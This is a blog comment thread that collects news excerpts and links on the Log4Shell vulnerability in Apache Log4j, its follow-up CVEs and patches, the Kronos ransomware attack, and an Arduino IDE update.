Log4Shell Tools and Resources for Defenders – Continuously Updated
https://www.securityweek.com/log4shell-tools-and-resources-defenders-continuously-updated
The widely used Apache Log4j Java-based logging tool is affected by a critical remote code execution vulnerability that has been increasingly exploited by malicious actors, including to deliver various types of malware.
The vulnerability is tracked as CVE-2021-44228 and it has been dubbed Log4Shell and LogJam. The security hole exposes many organizations to attacks and exploitation is not difficult.
SecurityWeek has compiled a list of tools and other resources that can be useful for defenders concerned about the impact of the Log4Shell vulnerability on their organization.
Tomi Engdahl says:
https://www.facebook.com/groups/2600net/permalink/3192568400966263/
Nobody gonna comment on the Kronos hack? Thousands of accounts are actively having their direct deposit redirected. EVERYONE’s banks are going to be jacked dealing with this.
Top workforce management firm Kronos hit by ransomware attack
https://www.hackread.com/workforce-management-firm-kronos-ransomware-attack/
Kronos has taken down its private cloud services and advises customers to use “alternative business continuity protocols” while the company is working on mitigating the attack.
Kronos Private Cloud is an HR management firm, also known as Ultimate Kronos Group, offering timekeeping services to many high-profile firms globally. Reportedly, the company is the latest victim of a ransomware attack.
According to the company’s Executive VP, Bob Hughes, they noticed unusual activity this Saturday, and while mitigating the issue, they learned that UKG had suffered a ransomware attack.
Operations Restoring May Take Weeks
Kronos has sent emails to its corporate customers to notify them about the ransomware attack. The company stated that it had taken its private cloud services offline post the attack and advised customers to use “alternative business continuity protocols” since restoring operations may take several weeks.
After the attack, Kronos’ clients could not access payroll processing and staff management services. Hughes urged in his blog post that clients should switch to alternative services.
https://community.kronos.com/s/feed/0D54M00004wJKHiSAO?language=en_US
Communications sent to impacted Kronos Private Cloud (KPC) customers beginning December, 13 at 12:45AM ET:
We are reaching out to inform you of a cyber security incident that has disrupted the Kronos Private Cloud.
Tomi Engdahl says:
https://www.securityweek.com/sap-patches-log4shell-vulnerability-20-applications
Tomi Engdahl says:
Problematic Log4j Functionality Disabled as More Security Issues Come to Light
https://www.securityweek.com/problematic-log4j-functionality-disabled-more-security-issues-come-light
Developers of the widely used Apache Log4j Java-based logging tool have disabled problematic functionality as more security issues have come to light.
It was discovered recently that Log4j version 2.x is affected by a critical remote code execution vulnerability that can be easily exploited to take complete control of a system. The flaw is tracked as CVE-2021-44228, Log4Shell and LogJam, and it has been exploited in attacks since December 1, days before an official patch was released.
Log4Shell attacks have been launched by profit-driven cybercriminals to deliver DDoS malware, cryptocurrency miners, ransomware, and other malicious programs, as well as by Chinese and Iranian state actors.
Exploitation of the vulnerability involves sending a specially crafted request to the targeted system. The request generates a log using Log4j, which leverages the Java Naming and Directory Interface (JNDI) lookup feature to perform a request to an attacker-controlled server, from which a malicious payload is fetched and executed.
CVE-2021-44228 was patched on December 6 with the release of Log4j 2.15.0. However, it was soon discovered that the fix was incomplete in certain non-default configurations, and exploitation could still lead to denial-of-service (DoS) attacks “or worse.”
A new CVE identifier, CVE-2021-45046, was assigned to this issue, and another round of updates was released. The latest versions of Log4j — versions 2.12.2 and 2.16.0 — not only patch this vulnerability, but also completely remove the message lookups feature and disable access to JNDI by default.
“JNDI lookups will now return a constant value. Also, Log4j now limits the protocols by default to only java,” Log4j developers said.
It has also come to light that while the risk of attacks against Log4j version 1.x is lower, systems running this version are still vulnerable to attacks if JNDI is used in their configuration. CVE-2021-4104 has been assigned to this issue and while patches will not be released because version 1.x is no longer supported, mitigations are available.
Risk Based Security has analyzed the three CVEs and noted that CVE-2021-4104 is an “entirely different attack vector.”
The security firm pointed out that assigning a separate CVE to the incomplete fix for CVE-2021-44228 may be helpful to some organizations, but it can also cause confusion.
As companies scramble to assess impact, threat actors are increasingly exploiting the Log4Shell vulnerability in their attacks, and many organizations appear to be exposed.
Check Point reported seeing more than one million attack attempts, nearly half of which have been linked to known malicious groups. The company said it had seen exploitation attempts against 44% of corporate networks around the world.
https://blog.checkpoint.com/2021/12/13/the-numbers-behind-a-cyber-pandemic-detailed-dive/
Tomi Engdahl says:
As The Apache Software Foundation just patched Log4J 2.16.0, we’ve quickly whipped up a new release; Arduino IDE 1.8.18. We can all sleep safe again!
https://www.arduino.cc/en/software